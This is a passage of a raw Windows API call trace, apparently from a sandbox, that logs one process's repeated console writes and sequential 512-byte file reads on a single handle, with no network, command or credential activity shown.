0x50 [0193.103] GetFileType (hFile=0x50) returned 0x1 [0193.103] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.103] GetFileType (hFile=0x50) returned 0x1 [0193.103] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.103] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.103] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.103] GetFileType (hFile=0x50) returned 0x1 [0193.103] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.103] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.103] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.103] GetFileType (hFile=0x50) returned 0x1 [0193.103] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.103] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.103] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.103] GetFileType (hFile=0x50) returned 0x1 [0193.103] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.103] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.103] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.103] GetFileType (hFile=0x50) returned 0x1 [0193.103] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.103] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.104] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.104] GetFileType (hFile=0x50) returned 0x1 [0193.104] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.104] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.104] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.104] GetFileType (hFile=0x50) returned 0x1 [0193.104] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.104] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.104] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.104] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.104] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.104] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.104] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.104] GetFileType (hFile=0x50) returned 0x1 [0193.104] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.105] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.105] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.105] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.105] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.105] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.105] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.105] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.105] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.105] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.105] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.106] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.106] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.159] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.159] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.159] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.159] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.159] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.159] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.159] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.159] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.160] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.160] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.160] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.160] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.160] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.160] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.160] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.160] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.160] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.160] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.160] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.160] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.161] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.161] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.161] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.161] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.161] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.161] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.161] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.161] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.161] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.161] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.161] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.162] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.162] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.162] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.162] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.162] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.162] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.162] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.162] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.162] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.162] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.162] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.162] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.162] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.163] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.163] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.163] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.163] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.163] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.163] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.163] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.163] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.163] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.163] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.163] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.164] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.164] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.164] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.164] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.164] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.164] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.164] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.164] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.164] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.164] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.164] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.164] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.165] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.165] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.165] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.165] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.165] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.165] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.165] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.165] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.165] ReadFile (in: 